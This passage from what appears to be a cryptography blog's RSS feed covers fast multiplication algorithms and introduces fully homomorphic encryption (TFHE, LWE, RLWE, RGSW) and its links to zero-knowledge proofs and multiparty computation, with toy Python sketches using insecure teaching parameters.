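The wrap-around terms land at index $i+j-n$ with weight $r^{(i+j-n)+n}=-r^{i+j-n}$, which is exactly the sign flip the negacyclic convolution requires.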
&lt;p&gt;A comparison of the different methods implemented in GNU Multiple Precision Arithmetic Library is shown in this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gmplib.org&#x2F;devel&#x2F;&quot;&gt;link&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Choosing the right algorithms to carry out routine calculations, such as integer or polynomial multiplications, can have a dramatic effect on the performance of software. Depending on the size of the integers, it is possible to speed up (reducing the number of calculations) by adopting a divide and conquer approach: we break the calculation into smaller ones, which can be easily tackled, or continue breaking them down until they are manageable. All the fast algorithms we presented make use of this approach, leading to significant savings in computations. The FFT, thanks to its $\mathcal{O}(n\log(n))$ complexity, can be a valuable tool to accelerate computations, even though it may at first seem weird or far-fetched!&lt;&#x2F;p&gt;
&lt;h2 id=&quot;notes&quot;&gt;Notes&lt;&#x2F;h2&gt;
&lt;p&gt;(1) If this is not possible, the most significant part can be shorter than the rest.&lt;br &#x2F;&gt;
(2) We will drop the multiplication symbol just for convenience.&lt;br &#x2F;&gt;
(3) We mentioned this earlier with the Toom-Cook method. For example, we know from geometry that we need to give two points to determine a straight line, which is a one-degree polynomial.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>An introduction to Fully Homomorphic Encryption (FHE)</title>
          <pubDate>Fri, 23 Dec 2022 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/fully-homomorphic-encryption/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/fully-homomorphic-encryption/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/fully-homomorphic-encryption/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Recently, cloud computing and storage have changed the way businesses and individuals use, store and manage their data. To be secure, data is encrypted using a secure cryptographic scheme, such as AES, where a secret key is needed to decrypt and read the data. Before 2009, if we wanted to perform data analytics on an untrusted server, we needed to provide access to the data in the clear or hand the key encrypting the data to the server. Either option had its risks: the server could learn valuable or sensitive information, and we could not fully control what it did with it later on. Even if the other party were honest, an attacker could breach its security and gain access to our private information in the clear (or to the key). Fully homomorphic encryption (FHE) is a powerful cryptographic primitive that allows parties to compute with encrypted data, without needing to decrypt it first. It has applications in finance, health care systems, image and text classification, machine learning, electronic voting, and multiparty computation. An easy example would be wanting to calculate the sum of two numbers, \( a \) and \( b \). Instead of summing them directly, we could encrypt them as \( E(a) \) and \( E(b) \), perform some operation \( E(a)\oplus E(b) \), and get \( E(c)=E(a)\oplus E(b) \), where \( c=a+b \).&lt;&#x2F;p&gt;
&lt;p&gt;More formally, the idea is we have our data as plaintext and we want to compute some function over that plaintext space (for example, we could work with integers, \( \mathbb{Z} \), representing the salaries of individuals and want to compute the average function). To do so, we transform our plaintexts to ciphertexts and perform operations over the ciphertext space, such that the resulting ciphertext is the encryption of the function applied to the plaintexts: \( E(f(x))=\hat{f}(E(x)) \). In a &lt;a href=&quot;&#x2F;arithmetization-schemes-for-zk-snarks&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt;, we covered that computations could be expressed as arithmetic circuits, where we have two operations: addition and multiplication. If we could get those operations to work on ciphertexts, then, in principle, we could build more complex functions.&lt;&#x2F;p&gt;
&lt;p&gt;A homomorphism is a function between two &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;algebraic structures&lt;&#x2F;a&gt; of the same kind (such as two groups, rings, fields, or vector spaces, to name a few), which preserves their structure. In particular, we are interested in ring homomorphisms, where we have a set with two operations. Given rings \( (\mathcal{R_1},+,\times) \) and \( (\mathcal{R_2},\oplus,\cdot) \), a function \( f:\mathcal{R_1}\rightarrow \mathcal{R_2} \) is a (ring) homomorphism if, given any \( x,y \) in \( \mathcal{R_1} \),&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;\( f(x+y)=f(x)\oplus f(y) \)&lt;&#x2F;li&gt;
&lt;li&gt;\( f(x\times y)=f(x)\cdot f(y) \)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Two common examples of homomorphisms are between integers with ordinary operations \( (\mathbb{Z},+,\times) \) and the integers modulo \(p \) with their operations \( (\mathbb{Z}&#x2F;p\mathbb{Z},+,\times) \). Another example is between polynomials, \( (\mathbb{Z}[X],+,\times) \) and integers \( (\mathbb{Z},+,\times) \) when we use the evaluation of the polynomial at a point as morphism. We can see that it is the same if we first sum or multiply two polynomials and then evaluate them at point \( x_0 \), or we first evaluate the polynomials at \( x_0 \) and then add or multiply the results. Given \( p(x), q(x) \) polynomials and \( \circ \) an operation (addition or multiplication), \( (p\circ q)(x_0)=p(x_0)\circ q(x_0) \).&lt;&#x2F;p&gt;
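&lt;p&gt;A quick sketch of the evaluation homomorphism, with polynomials represented as coefficient lists (the helper names are ours, chosen only for illustration):&lt;&#x2F;p&gt;

```python
from itertools import zip_longest

# Evaluation at a point x0 is a ring homomorphism from polynomials to integers.
def poly_add(p, q):
    return [a + b for a, b in zip_longest(p, q, fillvalue=0)]

def poly_mul(p, q):
    out = [0] * (len(p) + len(q) - 1)
    for i, a in enumerate(p):
        for j, b in enumerate(q):
            out[i + j] += a * b
    return out

def evaluate(p, x0):
    # coefficient list [c0, c1, c2, ...] represents c0 + c1*x + c2*x^2 + ...
    return sum(c * x0 ** i for i, c in enumerate(p))

p, q, x0 = [1, 2], [3, 0, 1], 5   # p(x) = 1 + 2x, q(x) = 3 + x^2
```

Adding or multiplying first and then evaluating gives the same result as evaluating first and then combining.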
&lt;p&gt;The first FHE scheme was presented in 2009 by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;crypto.stanford.edu&#x2F;craig&#x2F;craig-thesis.pdf&quot;&gt;Craig Gentry&lt;&#x2F;a&gt;. To get an idea of how the scheme works, we can imagine the ciphertext to contain an error or noise attached to it. As long as the error is not large, we can decrypt the ciphertext and recover the plaintext. If we add or multiply ciphertexts, the error increases; if it is above a certain threshold, then decryption will not work. The key point introduced in Gentry’s work is bootstrapping, by which we can take a ciphertext and a public evaluation key and re-encrypt the message, reducing the error. This enables the computation of circuits of higher depth (performing more operations).&lt;&#x2F;p&gt;
&lt;p&gt;Even though Gentry’s construction proved that FHE is possible, it was far too slow to be practical, taking as much as half an hour to bootstrap a single bit. Since then, there have been numerous advances, and bootstrapping can now be done on the scale of microseconds per bit (an improvement of nearly 10 orders of magnitude). There are four generations of FHE schemes as of today. Some constructions are Brakerski&#x2F;Fan-Vercauteren (BFV) and Brakerski-Gentry-Vaikuntanathan (BGV) for integer arithmetic, Cheon-Kim-Kim-Song (CKKS) for real number arithmetic, and Ducas-Micciancio (DM) and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;421.pdf&quot;&gt;Chillotti-Gama-Georgieva-Izabachene&lt;&#x2F;a&gt; (CGGI&#x2F;TFHE) for boolean circuits and arbitrary functions. In this post, we will focus on fully homomorphic encryption over the torus (TFHE).&lt;&#x2F;p&gt;
&lt;p&gt;Currently, schemes can be divided into:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Bootstrapping approach. This has no depth limitations: bootstrapping is done whenever needed to reduce the noise. It works better when the circuit is very deep or its depth is unknown. TFHE is an example of this approach.&lt;&#x2F;li&gt;
&lt;li&gt;Levelled approach. This requires the circuit to be known in advance and works better when its depth is small. CKKS is an example of this strategy.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;The security of many FHE schemes is based on the hardness of the ring learning with errors (RLWE) problem. This is closely related to a famous hard lattice problem, which is thought to be secure against quantum computers. Quantum computers are efficient at breaking homomorphic encryption schemes based on Abelian groups.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;encryption-using-tfhe&quot;&gt;Encryption using TFHE&lt;&#x2F;h2&gt;
&lt;p&gt;TFHE supports various schemes to encrypt different variables or to perform certain operations.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;lwe-scheme&quot;&gt;LWE scheme&lt;&#x2F;h3&gt;
&lt;p&gt;Suppose that we want to encrypt a message \( m \), which can be a bit or a modular integer. To encrypt, we need two numbers, \( p \) and \( q \), a secret key \( s \) of \( n \) bits (depending on the security level), and an error distribution, from which we will sample the error \( e \). We also need to sample a random vector \( a \) with \( n \) elements in \( \mathbb{Z}&#x2F;q\mathbb{Z} \). Here \( q=2^{n_b} \), where \( n_b \) is the number of bits of the ciphertext, and \( p=2^{m_b} \), with \( m_b \) the number of bits of the plaintext. Typically, \( q \) is on the order of \( 2^{32} \) to \( 2^{64} \). The error \( e \) should be less than \( q&#x2F;2p \); otherwise, it could corrupt the message’s bits when adding or multiplying.&lt;&#x2F;p&gt;
&lt;p&gt;The ciphertext, \( c \), resulting from the encryption of \( m \) is given by&lt;br &#x2F;&gt;
\[ E(m,s)=c=(a,b) \]&lt;br &#x2F;&gt;
where \( b=\sum_{k=1}^n a_ks_k+e+\Delta m \). Here, \( \Delta=q&#x2F;p \), so that the message is encoded in the most significant bits of the ciphertext.&lt;&#x2F;p&gt;
&lt;p&gt;To decrypt, we have to use the key to eliminate \( \sum_{k=1}^n a_ks_k \) and round the result (take the most significant bits),&lt;br &#x2F;&gt;
\[ D(c,s)=\mathrm{round}(b-\sum_{k=1}^n a_ks_k) \]&lt;&#x2F;p&gt;
&lt;p&gt;This scheme supports ciphertext addition and multiplication by a constant factor. The addition, \( \oplus \), of two ciphertexts is&lt;br &#x2F;&gt;
\[ E(m_1,s)\oplus E(m_2,s)=(a_1+a_2,b_1+b_2) \]&lt;br &#x2F;&gt;
The multiplication by a constant factor \( \alpha \) is&lt;br &#x2F;&gt;
\[ \alpha E(m,s)=(\alpha a,\alpha b)\]&lt;&#x2F;p&gt;
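&lt;p&gt;A toy sketch of the LWE scheme above, with deliberately small, insecure parameters (the names and sizes are illustrative assumptions, not TFHE’s actual ones):&lt;&#x2F;p&gt;

```python
import random

# Toy LWE sketch with illustrative (insecure!) parameters.
N = 16                 # key length
Q = 2 ** 32            # ciphertext modulus, q = 2^{n_b}
P = 2 ** 8             # plaintext modulus, p = 2^{m_b}
DELTA = Q // P         # Delta = q / p puts the message in the top bits

def keygen():
    return [random.randint(0, 1) for _ in range(N)]

def encrypt(m, s):
    a = [random.randrange(Q) for _ in range(N)]
    e = random.randint(-DELTA // 8, DELTA // 8)   # error stays well below Delta/2
    b = (sum(ai * si for ai, si in zip(a, s)) + e + DELTA * m) % Q
    return (a, b)

def decrypt(c, s):
    a, b = c
    noisy = (b - sum(ai * si for ai, si in zip(a, s))) % Q
    return ((noisy + DELTA // 2) // DELTA) % P    # round away the error

def add(c1, c2):
    (a1, b1), (a2, b2) = c1, c2
    return ([(x + y) % Q for x, y in zip(a1, a2)], (b1 + b2) % Q)

s = keygen()
```

Since each error is bounded well below half of \( \Delta \), the rounding step in decryption recovers the message, and adding two ciphertexts decrypts to the sum of the plaintexts.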
&lt;h3 id=&quot;ring-learning-with-errors-rlwe&quot;&gt;Ring Learning with Errors (RLWE)&lt;&#x2F;h3&gt;
&lt;p&gt;In this case, the message is a polynomial \( M(x) \) modulo \( x^N+1 \), which contains \( N \) coefficients. The key \( S(x) \) is a polynomial with coefficients in \( \{0,1\} \). The encryption function is&lt;br &#x2F;&gt;
\[ E(M(x),S(x))=(A(x),B(x))\]&lt;br &#x2F;&gt;
with \( B(x)=A(x)\cdot S(x)+E(x)+\Delta M(x) \). The error is now a polynomial of degree \( N-1 \), too.&lt;&#x2F;p&gt;
&lt;p&gt;The scheme supports the addition of ciphertexts and multiplication by a constant polynomial.&lt;&#x2F;p&gt;
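&lt;p&gt;The same idea can be sketched over the negacyclic ring \( \mathbb{Z}_q[x]&#x2F;(x^N+1) \) commonly used in TFHE, again with toy, insecure parameters chosen only for illustration:&lt;&#x2F;p&gt;

```python
import random

# Toy RLWE sketch over Z_q[x]/(x^N + 1) with illustrative (insecure!) parameters.
N, Q, P = 8, 2 ** 16, 2 ** 4
DELTA = Q // P

def poly_mul_mod(a, b):
    # product reduced modulo x^N + 1 (wrap-around terms flip sign) and modulo Q
    out = [0] * N
    for i in range(N):
        for j in range(N):
            k = i + j
            if k >= N:
                out[k - N] = (out[k - N] - a[i] * b[j]) % Q
            else:
                out[k] = (out[k] + a[i] * b[j]) % Q
    return out

def encrypt(m, s):
    a = [random.randrange(Q) for _ in range(N)]
    e = [random.randint(-2, 2) for _ in range(N)]  # small error polynomial E(x)
    a_s = poly_mul_mod(a, s)
    b = [(x + y + DELTA * z) % Q for x, y, z in zip(a_s, e, m)]
    return (a, b)

def decrypt(c, s):
    a, b = c
    noisy = [(x - y) % Q for x, y in zip(b, poly_mul_mod(a, s))]
    return [((v + DELTA // 2) // DELTA) % P for v in noisy]

s = [random.randint(0, 1) for _ in range(N)]   # binary key polynomial S(x)
m = [3, 1, 4, 1, 5, 9, 2, 6]                   # message coefficients, each below P
```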
&lt;h3 id=&quot;ring-gsw-rgsw&quot;&gt;Ring GSW (RGSW)&lt;&#x2F;h3&gt;
&lt;p&gt;This scheme supports the addition and multiplication of ciphertexts. The message, key, and error are the same as in RLWE, but the ciphertext is different. We can think of it as a three-dimensional matrix, containing \( \ell \) layers of&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$A_j(x)$&lt;&#x2F;th&gt;&lt;th&gt;$B_j(x)$&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;$A_j^\star(x)$&lt;&#x2F;td&gt;&lt;td&gt;$B_j^\star(x)$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;The resulting polynomials are given by the following relations:&lt;br &#x2F;&gt;
\[ B_j(x)=A_j(x)S(x)+E_j(x)-M(x)S(x)\frac{q}{\beta^j} \]&lt;&#x2F;p&gt;
&lt;p&gt;\[ B_j^\star(x)=A_j^\star(x)S(x)+E_j^\star(x)+M(x)S(x)\frac{q}{\beta^j} \]&lt;&#x2F;p&gt;
&lt;p&gt;Addition and multiplication by a constant polynomial follow the same rules as the cases before. To multiply two messages, we need to decompose each layer of the first term into \( \ell \) smaller polynomials and perform a multiplication between this decomposition and the corresponding layer of the other ciphertext.&lt;&#x2F;p&gt;
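&lt;p&gt;The decomposition step can be sketched for plain integers (a simplified illustration with hypothetical helper names; in the actual scheme the same base-\( \beta \) digit decomposition is applied coefficient-wise to polynomials):&lt;&#x2F;p&gt;

```python
# Base-beta digit decomposition: v is split into l small digits
# so that v == sum(d_i * beta**i), with each digit below beta.
def decompose(v, beta, l):
    digits = []
    for _ in range(l):
        digits.append(v % beta)
        v //= beta
    return digits

def recompose(digits, beta):
    return sum(d * beta ** i for i, d in enumerate(digits))
```

Working with small digits instead of full-size coefficients is what keeps the noise growth of the multiplication under control.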
&lt;h3 id=&quot;summary-of-ciphertexts&quot;&gt;Summary of ciphertexts&lt;&#x2F;h3&gt;
&lt;p&gt;The following table summarizes the different types of ciphertexts and the supported operations.&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Case&lt;&#x2F;th&gt;&lt;th&gt;Addition&lt;&#x2F;th&gt;&lt;th&gt;Constant Mult&lt;&#x2F;th&gt;&lt;th&gt;Multiplication&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;LWE&lt;&#x2F;td&gt;&lt;td&gt;Yes&lt;&#x2F;td&gt;&lt;td&gt;Yes&lt;&#x2F;td&gt;&lt;td&gt;No&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;RLWE&lt;&#x2F;td&gt;&lt;td&gt;Yes&lt;&#x2F;td&gt;&lt;td&gt;Yes&lt;&#x2F;td&gt;&lt;td&gt;No&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;RGSW&lt;&#x2F;td&gt;&lt;td&gt;Yes&lt;&#x2F;td&gt;&lt;td&gt;Yes&lt;&#x2F;td&gt;&lt;td&gt;Yes&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;h2 id=&quot;turning-private-key-into-public-key-schemes&quot;&gt;Turning private key into public key schemes&lt;&#x2F;h2&gt;
&lt;p&gt;Rothblum’s theorem states that a semantically secure private key homomorphic encryption scheme, which can perform addition modulo 2, can be turned into a public key semantically secure homomorphic scheme.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;external-product-and-controlled-multiplexer-cmux-gates&quot;&gt;External product and controlled multiplexer (CMux) gates&lt;&#x2F;h2&gt;
&lt;p&gt;The external product, \( \times \), is an operation involving an RLWE ciphertext and an RGSW ciphertext, outputting an RLWE ciphertext. To perform the external product, we have to decompose the \( A(x) \) and \( B(x) \) polynomials in the RLWE ciphertext and perform a matrix-vector product between this decomposition and the layers of the RGSW ciphertext.&lt;&#x2F;p&gt;
&lt;p&gt;One interesting application of the external product is related to the controlled mux gate, where we assign values according to an if condition. Given two values, \( y_1, y_2 \) and a boolean variable \( b \), we can construct the following operation&lt;br &#x2F;&gt;
\[ (y_2-y_1)b+y_1=y \]&lt;&#x2F;p&gt;
&lt;p&gt;If \( b \) is \( 0 \), we get \( y_1 \) and if \( b=1 \) we get \( y_2 \).&lt;&#x2F;p&gt;
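&lt;p&gt;In the clear, the CMux selection rule is just this arithmetic identity (in TFHE, \( b \) would be encrypted and the products computed homomorphically via the external product):&lt;&#x2F;p&gt;

```python
def cmux(b, y1, y2):
    # controlled multiplexer: returns y1 when b == 0 and y2 when b == 1
    return (y2 - y1) * b + y1
```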
&lt;p&gt;This is an important building block for the bootstrapping operation.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;key-switching&quot;&gt;Key switching&lt;&#x2F;h2&gt;
&lt;p&gt;The key-switching operation changes the key under which a ciphertext is encrypted, possibly across different parameter sets. To implement it, we need key-switching keys. The procedure has some parallelism with bootstrapping, with the key difference that it increases the noise in the ciphertext. Key switching can be applied to change the keys in LWE and RLWE ciphertexts, but it can also be used to transform LWE ciphertexts (one or many) into one RLWE ciphertext.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;FHE is an important cryptographic primitive that allows us to compute with encrypted data without needing to decrypt it first, opening the doors for many new and interesting applications. Since 2009, four generations of FHE schemes have been proposed, adding new functionalities and improving performance by several orders of magnitude. There are two types of approaches: bootstrapped and levelled. The first works for circuits that are deep or whose depth is unknown, while the second works for circuits of small, known depth. The security of many FHE schemes relies on post-quantum hard problems, such as ring learning with errors (RLWE). One powerful scheme is TFHE, a bootstrapped construction that operates on different types of ciphertexts to attain rich functionality. In upcoming posts, we will cover other schemes and go deeper into the fundamentals of FHE.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Fully-homomorphic encryption, zero-knowledge proofs, and multiparty computation</title>
          <pubDate>Fri, 16 Dec 2022 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/fully-homomorphic-encryption-zero-knowledge-proofs-and-multiparty-computation/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/fully-homomorphic-encryption-zero-knowledge-proofs-and-multiparty-computation/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/fully-homomorphic-encryption-zero-knowledge-proofs-and-multiparty-computation/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Cloud computing and storage have changed the way businesses and people use, store and manage their data. Data is securely stored in an encrypted form, typically using a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;symmetric-encryption&#x2F;&quot;&gt;symmetric key encryption scheme&lt;&#x2F;a&gt;, such as AES or ChaCha20. However, to perform data analytics, we have to either give the key to the server so that it can decrypt the data, or download the data, decrypt it, and run the calculations on our own, which can be costly in time or memory. Fully homomorphic encryption (FHE) allows us to delegate computations involving encrypted data to untrusted third parties, without any need to decrypt them first.&lt;&#x2F;p&gt;
&lt;p&gt;Even if this is a very powerful cryptographic primitive, we still face a big challenge: how do we know that the third party performed the calculation it was supposed to do? This is where zero-knowledge proofs (ZKP) come into play. ZKP allow us to prove the integrity of a given computation, without the need to re-execute it. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;zk-SNARKs&lt;&#x2F;a&gt; (succinct non-interactive arguments of knowledge) yield short proofs which can be verified very fast and have applications in decentralized ledgers (solving both privacy and scalability issues) and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;decentralized-private-computation-zexe-and-veri-zexe&#x2F;&quot;&gt;decentralized private computations&lt;&#x2F;a&gt;. They also face some challenges: generating proofs for arbitrary computations can be expensive and users with less powerful devices may not be able to generate them. Many zk-SNARKs require trusted setups, which should be generated by an honest party to ensure that nobody can cheat and generate fake proofs.&lt;&#x2F;p&gt;
&lt;p&gt;Both of these challenges can be addressed by multiparty computation (MPC). In this scheme, the generation of the proof or the establishment of the trusted setup is entrusted to various parties, which could have partial access to the data. In the case of setup ceremonies, as long as one of the parties involved is honest, the setup is secure. MPC can also be used, together with decentralized ledgers, to ensure that anyone can participate in setup ceremonies and to prevent malicious parties from blocking honest participants, using proofs with transparent setups (such as STARKs, scalable transparent arguments of knowledge).&lt;&#x2F;p&gt;
&lt;p&gt;Proof generation can be carried out by multiple servers, each of them having partial information on the secret inputs. Each party can submit a proof attesting to the correctness of its part of the proof generation protocol. Multiparty computation can also be used to perform calculations among different parties, each of them holding different pieces of information relevant to the problem, such as financial information between banks or health-related information among health service providers. FHE helps parties share information and make calculations without revealing their data, or train machine learning models without compromising sensitive data.&lt;&#x2F;p&gt;
&lt;p&gt;It is clear from all the above that FHE, ZKP, and MPC have many points in common and each has something to offer to the other. ZKP can provide integrity of computations, FHE allows data sharing and calculation without compromising it and MPC gives us the power to delegate expensive computations to other parties. These open the doors for many new and exciting applications in finance, health, and medical sectors, with an emphasis on data privacy and decentralization.&lt;&#x2F;p&gt;
&lt;p&gt;We will now explain the basic idea behind each of these primitives.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;fully-homomorphic-encryption&quot;&gt;Fully Homomorphic encryption&lt;&#x2F;h2&gt;
&lt;p&gt;Fully homomorphic encryption is a form of encryption where we can perform operations with encrypted data, and the result of those operations is the encryption of the corresponding operation applied to the plaintexts. For example, in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;how-to-create-your-own-crappy-rsa-as-a-software-developer&#x2F;&quot;&gt;RSA cryptosystem&lt;&#x2F;a&gt;, we encrypt a message \( m \) using the public key by taking&lt;&#x2F;p&gt;
&lt;p&gt;\[ E(m)=m^e \pmod{n} \]&lt;&#x2F;p&gt;
&lt;p&gt;Now suppose that we have two numbers \( m_1,m_2 \) and we want to compute their product \( m_1\times m_2 \). If we perform the product and then encrypt, we get&lt;&#x2F;p&gt;
&lt;p&gt;\[ E(m_1\times m_2)=(m_1\times m_2)^e \pmod{n} \]&lt;&#x2F;p&gt;
&lt;p&gt;If we take the product of the encrypted forms of \( m_1,m_2 \), then&lt;&#x2F;p&gt;
&lt;p&gt;\[ E(m_1)\times E(m_2)=m_1^e\times m_2^e=(m_1\times m_2)^e \pmod{n} \]&lt;&#x2F;p&gt;
&lt;p&gt;which is the same as calculating first the product and then encrypting. The operation in the encrypted space need not be the same as the one in the original. Given this property of the RSA cryptosystem, many researchers started wondering whether it could be possible to build a fully homomorphic encryption scheme. The first FHE scheme was presented in 2009 by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;crypto.stanford.edu&#x2F;craig&#x2F;craig-thesis.pdf&quot;&gt;Craig Gentry&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
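&lt;p&gt;The multiplicative property is easy to check with toy, insecure RSA parameters (chosen only for illustration):&lt;&#x2F;p&gt;

```python
# Textbook RSA with toy (insecure!) parameters, to check the multiplicative property.
p, q = 61, 53
n = p * q              # modulus n = 3233
e = 17                 # public exponent, coprime with (p - 1) * (q - 1)

def encrypt(m):
    return pow(m, e, n)

m1, m2 = 7, 12
```

Encrypting the product gives the same ciphertext as multiplying the two encryptions modulo the RSA modulus.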
&lt;h3 id=&quot;math-interlude-homomorphisms&quot;&gt;Math interlude: Homomorphisms&lt;&#x2F;h3&gt;
&lt;p&gt;To be more precise, a homomorphism is a function between two &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;algebraic structures&lt;&#x2F;a&gt; (such as two groups, two rings, or two vector spaces) that preserves their structure. If you have taken a course on linear algebra, linear transformations are examples of homomorphisms. In the context of groups, suppose we have two groups \( (\mathbb{G}_1,\cdot) \) and \( (\mathbb{G}_2,\oplus) \), each with its binary operation (it could be multiplication, addition, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;what-every-dev-needs-to-know-about-elliptic-curves&#x2F;&quot;&gt;elliptic curve addition&lt;&#x2F;a&gt;, function composition, etc.). A function \( f:\mathbb{G}_1\rightarrow\mathbb{G}_2 \) is a homomorphism if, given \( x,y \) in \( \mathbb{G}_1 \), we have&lt;&#x2F;p&gt;
&lt;p&gt;\[ f(x\cdot y)=f(x)\oplus f(y) \]&lt;&#x2F;p&gt;
&lt;p&gt;Note that the operation between the images \( f(x),f(y) \) is the operation over \( \mathbb{G}_2 \). We also saw examples of homomorphisms between rings when we defined modular arithmetic: we have a function preserving addition and multiplication from the set of integers with the usual operations, \( (\mathbb{Z},+,\times) \), to the ring of integers modulo \( p \), \( (\mathbb{Z}&#x2F;p\mathbb{Z},\oplus,\cdot) \) (we use different symbols for addition and multiplication to remember that these are taken modulo \( p \)). For example, if we take \( p=7 \), we have \( \mathbb{Z}&#x2F;p\mathbb{Z}=\{0,1,2,3,4,5,6\} \). We can see that \( -5+3=-2 \) corresponds to \( 2\oplus 3\equiv 5\pmod{7} \), where \( 2 \) is the element corresponding to \( -5 \) in \( \mathbb{Z}&#x2F;p\mathbb{Z} \), \( 3 \) corresponds to itself, and \( 5 \) is congruent to \( -2 \). Similarly, \( -3\times 4=-12 \) corresponds to \( 4\cdot 4\equiv 2\pmod{7} \).&lt;&#x2F;p&gt;
&lt;p&gt;It is important to see that homomorphisms are not necessarily one-to-one functions (the last ring homomorphism is a clear example). If the homomorphism is a bijective function, it is called an isomorphism. An example of an isomorphism is the map from the real numbers with addition, \( (\mathbb{R},+) \), to the positive real numbers with multiplication, \( (\mathbb{R}^+,\times) \): \( f:\mathbb{R}\rightarrow\mathbb{R}^+ \), \( f(x)=\exp(x) \), with inverse \( f^{-1}:\mathbb{R}^+\rightarrow\mathbb{R} \), \( f^{-1}(z)=\ln(z) \). You can easily check that \( f(x+y)=f(x)\cdot f(y) \).&lt;&#x2F;p&gt;
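&lt;p&gt;A one-line numerical check of this isomorphism:&lt;&#x2F;p&gt;

```python
import math

# exp maps (R, +) to (R_{>0}, *) and preserves the operation: f(x + y) = f(x) * f(y)
def f(x):
    return math.exp(x)

x, y = 1.3, 2.7
```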
&lt;p&gt;In the context of cryptography, we would like to have encryption or commitment schemes preserving some operations. For example, the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;Kate-Zaverucha-Goldberg&lt;&#x2F;a&gt; (KZG) commitment scheme is additively homomorphic. The commitment takes polynomials (which we can think of as a group with ordinary polynomial addition, \( (\mathbb{P},+) \)) and maps them into elliptic curve points (which also have a group structure, with elliptic curve addition, \( (\mathbb{G},\oplus) \)). We can verify that&lt;&#x2F;p&gt;
&lt;p&gt;\[ \mathrm{cm}(p_1(x)+p_2(x))=\mathrm{cm}(p_1(x))\oplus \mathrm{cm}(p_2(x)) \]&lt;&#x2F;p&gt;
&lt;p&gt;This property is useful for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;proof-aggregation-schemes-snarkpack-and-aplonk&#x2F;&quot;&gt;proof aggregation&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;incrementally-verifiable-computation-nova&#x2F;&quot;&gt;folding schemes&lt;&#x2F;a&gt;. Elliptic curve pairings also provide some way to compute multiplications between polynomials in committed form (using KZG).&lt;&#x2F;p&gt;
&lt;p&gt;To be able to construct an FHE scheme we need not only preserve operations but also have a way to decipher the result.&lt;&#x2F;p&gt;
